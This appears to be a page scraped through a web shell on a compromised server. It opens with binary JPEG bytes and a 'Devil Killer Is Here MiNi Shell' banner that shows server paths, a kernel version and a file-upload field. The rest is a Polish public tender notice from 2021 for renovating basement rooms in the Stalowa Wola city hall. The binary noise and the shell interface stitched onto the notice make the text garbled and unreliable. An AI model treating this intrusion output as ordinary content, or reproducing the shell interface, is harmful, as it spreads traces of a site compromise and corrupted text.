JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20210625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20210625/0009534201-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00095342 z dnia 2021-06-25</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa, modernizacja i zmiana sposobu użytkowania części pomieszczeń piwnicznych w budynku Urzędu Miasta Stalowej Woli przy. Ul. Wolności 7 z szczególnym uwzględnieniem likwidacji zawilgoceń </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi zamawiający centralny</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Stalowowolskie Centrum Usług Wspólnych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 384503002</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Jana Pawła II 25A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stalowa Wola</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-450</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">scuw@stalowawola.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.stalowawola.pl//?c=mdTresc-cmPokaz-1657</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa, modernizacja i zmiana sposobu użytkowania części pomieszczeń piwnicznych w budynku Urzędu Miasta Stalowej Woli przy. Ul. Wolności 7 z szczególnym uwzględnieniem likwidacji zawilgoceń </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cc004da4-d594-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00095342</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.stalowawola.pl/?c=mdPrzetargi-cmPokaz-1663 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym (SCUW) a Wykonawcami<br/>odbywa się przy użyciu miniPortalu, który jest dostępny<br/>pod adresem:https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal oraz poczty<br/>elektronicznej. 2.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia<br/>publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do<br/>formularzy:złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do<br/>komunikacji. 3.Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentów elektronicznych,elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). 4.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do:<br/>złożenia,zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB. 5. Za datę<br/>przekazania oferty,wniosków,zawiadomień,dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP. 6.Zamawiający może również komunikować się z Wykonawcami za pomocą<br/>pocztyelektronicznej,email:rkozlowski@stalowawola.pllub zp@stalowawola.pl.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Ogłoszenie nr 2021/BZP 00061336/01 z dnia 2021-05-21<br/>2021-05-21 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>- administratorem Pani/Pana danych osobowych jest Dyrektor Stalowowolskiego Centrum Usług<br/>Wspólnych al. Jana Pawła II 25A, 37-450 Stalowa Wola – Pani Danuta Bednarz.<br/>- inspektorem ochrony danych osobowych w Stalowowolskim Centrum Usług Wspólnych jest Pani Alina<br/>Pyz ODO PARTNER, Kępa Rzeczycka 10, 37-455 Radomyśl nad Sanem, adres e-mail:<br/>odopartner@gmail.com telefon 604 274 299.<br/>- Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego „Przebudowa, modernizacja i<br/>zmiana sposobu użytkowania części pomieszczeń piwnicznych w budynku Urzędu Miasta Stalowej<br/>Woli przy. Ul. Wolności 7 z szczególnym uwzględnieniem likwidacji zawilgoceń” prowadzonym w trybie<br/>zamówienia podstawowego zgodnie z art. 275 pkt 1 ustawy Pzp.<br/>- odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Pzp.<br/>- Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>- obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>- w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>- posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>- nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-II.271.66.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest przebudowa, modernizacja i zmiana sposobu użytkowania<br/>części pomieszczeń piwnicznych w budynku Urzędu Miasta Stalowej Woli przy. Ul. Wolności 7 z<br/>szczególnym uwzględnieniem likwidacji zawilgoceń.<br/>2. W ramach realizacji zamówienia Wykonawca będzie miał do zrealizowania 3 zadania tj:<br/>- Likwidację zawilgoceń pomieszczeń piwnicznych;<br/>- Przebudowę pomieszczeń piwnicznych;<br/>- remont oraz przebudowa schodów zewnętrznych<br/>4. W trakcie realizacji zadania UM pozostaje czynnym obiektem, w którym na co dzień<br/>przebywają zarówno pracownicy, jak i osoby trzecie. Harmonogram prac należy dopasować w<br/>uzgodnieniu z użytkownikiem obiektu aby umożliwić jego funkcjonowanie w trakcie prowadzenia<br/>robót budowlanych.<br/>5. Szczegółowy zakres robót określa dokumentacja projektowa, przedmiary robót oraz<br/>Szczegółowe Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych stanowiące<br/>załącznik do Specyfikacji Warunków Zamówienia.<br/>6. Materiały uzyskane w trakcie rozbiórek i ziemia z wykopów przedstawiające wartość użytkową<br/>lub materialną zostaną przekazane zamawiającemu. Wykonawca zobowiązany jest do ich<br/>przewiezienia w miejsce wskazane przez zamawiającego na odległość do 10 km.<br/>7. Zamawiający nie wymaga przeprowadzenia przez Wykonawcy wizji lokalnej lub sprawdzenia<br/>przez niego dokumentów niezbędnych do realizacji zamówienia na miejscu u Zamawiającego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45262520-2 - Roboty murowe</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421131-1 - Instalowanie drzwi</p> <p class="mb-0">45421132-8 - Instalowanie okien</p> <p class="mb-0">45421146-9 - Instalowanie sufitów podwieszanych</p> <p class="mb-0">45421152-4 - Instalowanie ścianek działowych</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień o których mowa w art. 214 ust.1 pkt 7 ustawy Pzp do wysokości 20% zamówienia podstawowego w zakresie:<br/>-	roboty w zakresie burzenia, murarskie, tynkarskie, malarskie, wykończeniowe;<br/>-	kładzenie płytek;<br/>-	roboty instalacji elektrycznych;<br/>-	roboty instalacyjne wodno-kanalizacyjne i sanitarne.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wynik – oferta, która przedstawia najkorzystniejszy bilans (maksymalna<br/>liczba przyznanych punktów w oparciu o ustalone kryterium) zostanie uznana<br/>za najkorzystniejszą,pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych<br/>punktów.Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą<br/>ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji i rekojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy potwierdzający spełnienie<br/>następujących warunków dotyczących:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>- Zamawiający nie określa szczegółowego warunku w tym zakresie;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>- Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;<br/>3) sytuacji ekonomicznej lub finansowej:<br/>- wykonawca winien posiadać środki finansowe lub zdolność kredytową zapewniającą realizację<br/>zamówienia w wysokości minimum 100 000,00 zł;<br/>4) Zdolności technicznej lub zawodowej:<br/>a) Wykonawca winien wykonać zadania odpowiadające swoim rodzajem przedmiotowi<br/>zamówienia tj. minimum:<br/>- 1 robotę ogólnobudowlaną w zakresie budowy/przebudowy/rozbudowy lub remontu budynku o<br/>wartości minimum 200 000,00 zł brutto,<br/>Oraz<br/>- 1 robotę w branży elektrycznej o wartości minimum 30 000,00 zł brutto<br/>Oraz<br/>- 1 robotę w branży sanitarnej o wartości minimum 20 000,00 zł brutto<br/>b) Wykonawca winien dysponować kadrą techniczną z uprawnieniami i kwalifikacjami tj.:<br/>- kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami<br/>budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń<br/>- kierownikiem robót posiadającym uprawnienia budowlane do kierowania robotami<br/>budowlanymi w specjalności instalacyjnej bez ograniczeń w zakresie sieci, instalacji i urządzeń<br/>cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;<br/>- kierownikiem robót posiadającym uprawnienia budowlane do kierowania robotami<br/>instalacyjnymi bez ograniczeń w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych.<br/>- koordynatorem ds. BHP posiadającym wyższe wykształcenie o kierunku lub specjalności w<br/>zakresie BHP albo studia podyplomowe w zakresie BHP oraz co najmniej 3-letni staż pracy w<br/>służbie BHP.<br/>Przez uprawnienia budowlane rozumie się uprawnienia wydane na podstawie rozporządzenia<br/>Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji<br/>technicznych w budownictwie (Dz. U. z 2014 r., poz. 1278) lub odpowiadające im ważne<br/>uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, lub odpowiadające im<br/>uprawnienia budowlane, które zostały wydane obywatelom państw Europejskiego Obszaru<br/>Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art.12a oraz innych<br/>przepisów ustawy z dnia 7 lipca 1994r. Prawo Budowlane (Dz. U. z 2018 r. poz. 1202, 1276,<br/>1496, 1669 i 2245 oraz z 2019 r. poz. 51) oraz ustawy z dnia 22 grudnia 2015 r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (<br/>Dz. U. z 2016 r., poz. 65).<br/>c) W zakresie dysponowania sprzętem, wykonawca winien dysponować:<br/>- Zamawiający nie wyznacza szczegółowego warunku w tym zakresie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">wykonawcy w okolicznościach, o których mowa w art. 108 oraz 109 ust. 1 ustawy Pzp, wykonawca<br/>przedkłada:1) informacji z Krajowego Rejestru Karnego w zakresie: a) art. 108 ust. 1 pkt 1 i 2 ustawy<br/>Pzp; b) art. 108 ust. 1 pkt 4 ustawy, dotyczącej orzeczenia zakazu ubiegania się o zamówienie<br/>publiczne tytułem środka karnego, – sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem;2)<br/>oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej<br/>grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów<br/>(Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową<br/>lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej<br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty,<br/>oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego<br/>wykonawcy należącego do tej samej grupy kapitałowej;3) zaświadczenia właściwego naczelnika<br/>urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w<br/>zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem,<br/>a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda<br/>złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o<br/>dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca<br/>dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności;4) zaświadczenia albo innego dokumentu właściwej<br/>terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału<br/>regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i<br/>zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed<br/>jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub<br/>zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów<br/>potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do<br/>udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności<br/>należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub<br/>zawarł wiążące porozumienie w sprawie spłat 